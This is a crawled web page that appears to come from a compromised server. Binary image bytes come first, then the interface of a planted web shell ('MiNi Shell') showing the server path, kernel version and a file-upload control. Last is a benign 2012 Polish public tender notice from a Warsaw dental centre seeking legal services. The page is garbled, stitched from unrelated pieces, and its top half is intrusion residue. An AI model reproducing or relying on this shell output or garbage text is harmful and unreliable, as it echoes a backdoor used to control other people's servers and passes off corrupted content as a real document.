JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120110/9625-N-2012.html

<p class="kh_header"><b>Warszawa: Świadczenie usług pomocy prawnej na rzecz Mazowieckiego Centrum Stomatologii Sp. z o.o. w Warszawie (Nr ref. sprawy: ZP/01/12)</b><br>
<b>Numer ogłoszenia: 9625 - 2012; data zamieszczenia: 10.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Mazowieckie Centrum Stomatologii Sp. z o.o. , ul. Nowy Zjazd 1, 00-301 Warszawa, woj. mazowieckie, tel. 22 55 69 400, faks 22 55 69 403.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www. mcs-przychodnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pomocy prawnej na rzecz Mazowieckiego Centrum Stomatologii Sp. z o.o. w Warszawie (Nr ref. sprawy: ZP/01/12).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług pomocy prawnej na rzecz Mazowieckiego Centrum Stomatologii Sp. z o.o. w Warszawie polegające w szczególności na:
1)przeprowadzanie procedury udzielania zamówień publicznych w trybie przepisu art. 15 ustawy z dnia 29 stycznia 2004r. prawo zamówień publicznych (Dz. U. z 2010r. Nr 113 poz. 759 z późn. zm.), zwanej dalej ustawa Pzp;
2)nadzór formalno - prawny nad prowadzonymi postępowaniami, ze szczególnym uwzględnieniem umów z zakresu zamówień publicznych;
3)sporządzanie opinii prawnych wynikających z bieżących potrzeb Zamawiającego; 
4)konsultacje prawne w szczególności dotyczące zagadnień z zakresu Prawa zamówień publicznych, także z wykorzystaniem środków komunikacji bezpośredniej, 
w szczególności telefonicznie i drogą elektroniczną; 
5)wykonywanie usługi także w siedzibie Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające obejmują zwiększenie częstotliwości świadczenia usług prawniczych do wartości 15% kwoty zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 00,00 PLN (słownie: 00/100) Wykonawcy składający oferty nie są zobowiązani do wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Uprawnienia osób do realizacji pomocy prawnej w rozumieniu przepisów ustawy    z dnia 6 lipca 1982r. o radcach prawnych oraz przepisów ustawy z dnia 26 maja 1982r. Prawo  o adwokaturze, a także przepisów regulujących świadczenie pomocy prawnej przez prawników zagranicznych - zgodnie z dopuszczonymi w tych przepisach formami prowadzonej działalności;
Ocena spełniania warunków odbędzie się na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykaz usług pomocy prawnej wraz z załączeniem dokumentu/dokumentów potwierdzającego/potwierdzających, że usługi w ww. zakresie zostały wykonane lub są wykonywane należycie w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwóch usług bieżącej obsługi prawnej (między innymi poprzez środki przekazu bezpośredniego) zakładów opieki zdrowotnej lub spółek prawa handlowego wykonujących działalność leczniczą, w zakresie zamówień publicznych, w okresie trwania, co najmniej 24 miesięcy (z zachowaniem ciągłości 24 miesięcy), o wartości powyżej 100 tys. pln brutto;
2. Wykaz usług pomocy prawnej wraz z załączeniem dokumentu/dokumentów potwierdzającego/potwierdzających, że usługi w ww. zakresie zostały wykonane lub są wykonywane należycie, w ciągu ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, w ramach, której świadczyli pomoc prawną w zakresie przygotowania i prowadzenia minimum 3. postępowań o zamówienie publiczne w imieniu i na rzecz Zamawiającego w trybie przewidzianym w trybie przepisu art. 15 ustawy, w tym co najmniej jedno powyżej wartości o których mowa w art. 11 ust. 8 ustawy;
3. Wykaz usług pomocy prawnej wraz z załączeniem dokumentu/dokumentów potwierdzającego/potwierdzających, że usługi w ww. zakresie zostały wykonane lub są wykonywane należycie, w ciągu ostatnich 3 lat przed upływem terminu składania ofert  w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 1 usługę pomocy prawnej w zakresie zastępstwa procesowego przed sądem powszechnym na rzecz zakładu opieki zdrowotnej w przedmiocie zatrzymania wadium w wyniku którego powództwo zostało oddalone;
4. Wykaz usług pomocy prawnej wraz z załączeniem dokumentu/dokumentów potwierdzającego/potwierdzających, że usługi w ww. zakresie zostały wykonane lub są wykonywane należycie, w ciągu ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, w ramach, której świadczyli pomoc na rzecz Zamawiającego, w co najmniej 3 postępowaniach wszczętych wniesionym odwołaniem do KIO  zakończonych pozytywnym wynikiem dla zakładu opieki zdrowotnej oraz w co najmniej 1 postępowaniu przed sądem okręgowym uzyskując wyrok zgodny z interesem Zamawiającego;
5. Wykaz usług pomocy prawnej na rzecz Zamawiającego - w rozumieniu ustawy, wraz z załączeniem dokumentu/dokumentów potwierdzającego/potwierdzających, że usługi w ww. zakresie zostały wykonane lub są wykonywane należycie, w ciągu ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, przy co najmniej 1 przekształceniu formy organizacyjno - prawnej zakładu opieki zdrowotnej z publicznego na niepubliczny lub przy co najmniej 1 zmianie formy organizacyjno - prawnej poprzez  likwidację samodzielnego publicznego zakładu opieki zdrowotnej i przejęcie działalności medycznej przez spółkę prawa handlowego prowadzącą działalność leczniczą;
6. Wykaz usług pomocy prawnej na rzecz Zamawiającego - w rozumieniu ustawy wraz z załączeniem dokumentu/dokumentów potwierdzającego/potwierdzających, że usługi w ww. zakresie zostały wykonane lub są wykonywane należycie, w ciągu ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, w co najmniej 1 postępowaniu o udzielenie zamówienia publicznego, polegającego na wdrożeniu informatyzacji zakładu opieki zdrowotnej, o którym mowa w art. 8 ust. 1 ustawy z dnia 30 sierpnia 1991r. o zakładach opieki zdrowotnej (Dz. U. z 2007r. Nr 14, poz. 89 z późn. zm.)
Ocena spełniania warunków odbędzie się na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykaz posiadania minimum 1. komputera przenośnego wraz z aktualnym oprogramowaniem zawierającym system informacji prawniczej;
2. Wykaz posiadania podpisu elektronicznego weryfikowanego przy pomocy  ważnego kwalifikowanego certyfikatu;
Ocena spełniania warunków odbędzie się na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykaz personelu Wykonawcy, który świadczył pomoc prawną wraz z załączeniem dokumentu/dokumentów potwierdzającego/potwierdzających, że usługi w ww. zakresie zostały wykonane lub są wykonywane należycie, w ciągu ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, polegającą na udziale w negocjacjach ze związkami zawodowymi oraz reprezentowaniu pracodawcy w toczącym się sporze zbiorowym;
2. Wykaz personelu Wykonawcy, który świadczył pomoc prawną wraz z załączeniem dokumentu/dokumentów potwierdzającego/potwierdzających, że usługi w ww. zakresie zostały wykonane lub są wykonywane należycie, w ciągu ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, polegającą na zastępstwie Zamawiającego przed sądami powszechnymi (w dwóch instancjach) oraz Sądem Najwyższym w postępowaniu toczącym się na skutek wniesienia powództwa dot. błędu w sztuce lekarskiej, z wynikiem pozytywnym dla Zamawiającego, tj. ze skutkiem oddalenia albo odrzucenia powództwa;
3. Wykaz personelu Wykonawcy, który świadczył pomoc prawną wraz z załączeniem dokumentu/dokumentów potwierdzającego/potwierdzających, że usługi w ww. zakresie zostały wykonane lub są wykonywane należycie, w ciągu ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, polegającą na udziale w posiedzeniach Rady Nadzorczej spółki prawa handlowego przez minimum 24 miesiące (z zachowaniem ciągłości usługi);
4. Wykaz personelu Wykonawcy: adwokat/radca prawny, koordynator obsługi 
u Zamawiającego (minimum 1 osoba), która spełnia następujące  wymagania: 
a)   posiadający wpis na listę radców prawnych lub adwokatów;
b)  wykonujący zawód adwokata/ radcy prawnego, co najmniej 5 lat;
c)  posiadający, co najmniej 5-letnie doświadczenie, jako radca prawny w świadczeniu pomocy prawnej na rzecz Zamawiających - zakładów opieki zdrowotnej lub spółek prawa handlowego realizujących działalność leczniczą; 
d) w okresie ostatniego roku uczestniczył, w prowadzonym postępowaniu 
o zamówienie publiczne przez pełnomocnika w trybie art. 15 ustawy - wykonując czynności zastrzeżone dla kierownika Zamawiającego, w co najmniej 1 postępowaniu o udzielenie zamówienia publicznego;
e) uczestniczył w okresie ostatniego roku w negocjacjach w imieniu Pracodawcy ze związkami zawodowymi oraz reprezentował Pracodawcę w toczącym się sporze zbiorowym zgodnie z właściwymi przepisami o rozwiązywaniu sporów zbiorowych;
f) w ostatnich 3 latach reprezentował, w co najmniej 10 postępowaniach przed Krajową Izbą Odwoławczą, Zamawiającego, w sprawach zakończonych oddaleniem albo odrzuceniem odwołania, w tym w co najmniej dwóch w imieniu zakładów opieki zdrowotnej;
g) w ostatnich 3 latach reprezentował, w co najmniej 1 postępowaniu przed sądem okręgowym w postępowaniach toczących się na skutek wniesienia skargi na wyrok Krajowej Izby Odwoławczej, Zamawiającego, w sprawach zakończonych oddaleniem albo odrzuceniem skargi;
h) w ostatnim roku reprezentował osoby obwinione w trybie przepisów  ustawy 
o odpowiedzialności za naruszenie dyscypliny finansów publicznych, przy czym w co najmniej jednym postępowaniu ze skutkiem uniewinnienia albo na etapie postępowania przed rzecznikiem dyscypliny finansów publicznych - zaniechania skierowania sprawy do komisji orzekającej.
5. Wykaz personelu Wykonawcy: adwokat/radca prawny (minimum 2 osoby), którzy  spełnią następujące  wymagania: 
a) radca prawny/adwokat, posiadający wpis na listę radców prawnych lub adwokatów - wykonujący zawód radcy prawnego/adwokata, co najmniej 5 lat oraz posiadający, co najmniej 5 - letnie doświadczenie jako radca prawny/adwokat w świadczeniu pomocy prawnej na rzecz spółek prawa handlowego, w tym poprzez udział w posiedzeniach organów spółki (przy czym co najmniej przez 24 miesiące 
w sposób ciągły) oraz brała udział w co najmniej jednym przekształceniu zakładu opieki zdrowotnej w spółkę prawa handlowego lub brała udział przy co najmniej jednej zmianie formy organizacyjno - prawnej poprzez  likwidację samodzielnego publicznego zakładu opieki zdrowotnej i przejęcie działalności medycznej przez spółkę prawa handlowego prowadzącą działalność leczniczą;
oraz:  
b) osoba posiadająca wyższe wykształcenie prawnicze, z co najmniej 3 - letnim doświadczenie zawodowym związanym z pomocą prawną na rzecz podmiotów wykonujących działalność leczniczą. 
Żadna ze wskazanych przez Wykonawcę osób do realizacji zamówienia nie może pełnić więcej niż 1 funkcji wymienionej przez Zamawiającego. Wykonawca powinien wykazać dysponowanie, co najmniej 3 osobami. 
Na potwierdzenie powyższego Zamawiający wymaga złożenia pisemnego oświadczenia; w przypadku koordynatora wraz z informacją o postępowaniach, 
w których brał udział, ze wskazaniem odpowiedniej sygnatury akt lub nazwy 
ww. postępowań.
 Ocena spełniania warunków odbędzie się na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualna opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, 
że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości co najmniej 1.000.000,00 zł (jeden milion  złotych);
Ocena spełniania warunków odbędzie się na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 45</li>
<li>2 - Usługi zgodnie z Załącznikiem Nr 5 do SIWZ - 35</li>
<li>3 - Usługi zgodnie z Załącznikiem Nr 6 do SIWZ - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust. 1, Prawa zamówień publicznych dopuszcza możliwość dokonania zmian zawartej umowy w formie pisemnego aneksu w następujących sytuacjach: 
1) zaistnienia omyłki pisarskiej lub rachunkowej, 
2) zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy  w dostawie energii elektrycznej) mającej wpływ na realizację Umowy, 
3) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy, 
4) zmiany ustawowej stawki podatku VAT, 
5) wystąpienia niezależnych od Zamawiającego i Wykonawcy istotnych okoliczności, które nie były znane na etapie wszczynania postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mcs-przychodnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Mazowieckie Centrum Stomatologii Sp. z o.o., ul. Nowy Zjazd 1, 00 - 301 Warszawa Opłata za SIWZ 48,80 zł (brutto).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.01.2012 godzina 08:30, miejsce: 18.01.2012 godzina 08:30, miejsce: Mazowieckie Centrum Stomatologii Sp. z o.o., ul. Nowy Zjazd 1, 00 - 301 Warszawa. Sekretariat (III piętro, pokój nr 321)..</p>
